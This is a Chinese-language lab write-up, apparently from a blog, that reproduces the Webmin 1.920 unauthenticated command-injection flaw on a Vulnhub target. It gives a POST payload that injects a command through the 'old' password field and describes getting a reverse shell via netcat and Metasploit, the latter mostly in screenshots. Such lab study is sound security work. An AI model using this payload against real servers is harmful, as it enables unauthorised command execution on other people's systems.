郑重声明:所用漏洞环境为自建虚拟机vulnhub靶机环境,仅供本人学习使用。
漏洞简述
Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。
影响版本:小于等于1.920
准备环境
测试机IP:192.168.79.129
靶机IP:192.168.79.131
1. 启动Vulnhub靶机环境:
![](https://img.haomeiwen.com/i15420652/95a1a4626c15a764.png)
2. 验证靶机应用启用成功:
![](https://img.haomeiwen.com/i15420652/4a1c3e0a03a738c0.png)
3. 通过nmap扫描确认Webmin版本
![](https://img.haomeiwen.com/i15420652/539b5f6d7955481f.png)
漏洞复现
引用:https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
POC:
![](https://img.haomeiwen.com/i15420652/188921db0962dfd2.png)
方法一:手工利用
1. 访问 /password_change.cgi页面
![](https://img.haomeiwen.com/i15420652/d9049825c7043aa8.png)
2. 通过Burp拦截
![](https://img.haomeiwen.com/i15420652/d6e67ff96745302c.png)
3. 改包重放,验证成功
#Request mode改为POST
#增加Referer: https://192.168.79.131:10000/session_login.cgi
#增加
user=test&pam=&expired=2&old=abc|id&new1=cba&new2=cba
注意:发送的user参数的值不是当前已知的Linux用户
![](https://img.haomeiwen.com/i15420652/7dbfaddf8bfc3770.png)
4. 使用NC侦听反弹端口
![](https://img.haomeiwen.com/i15420652/4668c755b4eccf73.png)
5. 通过Burp执行反弹命令
![](https://img.haomeiwen.com/i15420652/497a49b135434377.png)
6. 得到反弹Shell
![](https://img.haomeiwen.com/i15420652/5f4fba9200dd12e9.png)
方法二:使用MSF
![](https://img.haomeiwen.com/i15420652/e734a02ed596459c.png)
![](https://img.haomeiwen.com/i15420652/7c30aea041e5ef36.png)
![](https://img.haomeiwen.com/i15420652/914ec86fcc01448c.png)
关闭环境
![](https://img.haomeiwen.com/i15420652/a712e297afba0990.png)
网友评论